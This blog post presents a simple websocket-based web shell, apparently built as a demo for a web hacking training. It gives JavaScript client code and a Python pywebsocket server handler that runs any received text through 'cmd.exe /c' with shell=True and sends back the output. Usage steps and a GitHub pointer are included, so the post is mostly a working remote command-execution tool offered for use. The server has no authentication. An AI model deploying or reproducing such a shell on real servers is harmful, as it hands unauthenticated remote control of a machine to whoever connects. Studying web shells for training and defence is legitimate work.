Simple websockets based webshell
A simple client server Proof of Concept to show how websockets can be used to transfer and execute commands.
Introduction
I’m writing again after a year! It’s been an eventful one at that. Multiple conferences and two successful Xtreme Web Hacking trainings in that period.
As part of the XWH training that Akash and I did at nullcon 2015, I built an app to demo the functionality and usage of websockets. I went overboard and converted it into a full fledged web shell.
Websocket Client
The client is a simple connect and send call to a websockets server:
function WebSocketShell()
{
if ("WebSocket" in window)
{
var server = "serverip_or_hostname:9998/server"
var ws = new WebSocket("ws://" + server);
ws.onopen = function()
{
ws.send('ipconfig');
};
ws.onmessage = function (evt)
{
var received_msg = evt.data;
alert(received_msg);
};
ws.onclose = function(a)
{
alert('Error here');
};
}
else
{
alert("WebSocket not supported by your Browser!");
}
}
Websocket Server
The websockets server is a pywebsocket instance. The server side code is a python script that handles the incoming connection and the text.
The text is then passed to a subprocess.Popen
call to be executed on the server. The output is collected and sent back to the client via the websocket.
def web_socket_transfer_data(request):
while True:
line = request.ws_stream.receive_message()
if line is None:
return
if isinstance(line, unicode):
proc = subprocess.Popen('cmd.exe /c ' + line, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out = proc.stdout.read() + proc.stderr.read()
request.ws_stream.send_message(out, binary=False)
else:
request.ws_stream.send_message('Send plain text only!', binary=True)
Get it!
The code is available on Github.
Usage
To run the server on port 9998 (default in the code, can be changed):
- Get pywebsocket
- Run
python pywebsocket\mod_pywebsocket\standalone.py -p 9998 -w ws_server
- Open
index.html
in any browser that supports websockets. Latest Chrome/Firefox is good enough. - Enter a (Windows) command like
ipconfig
- Hit the
Execute!
button.
Happy Hacking!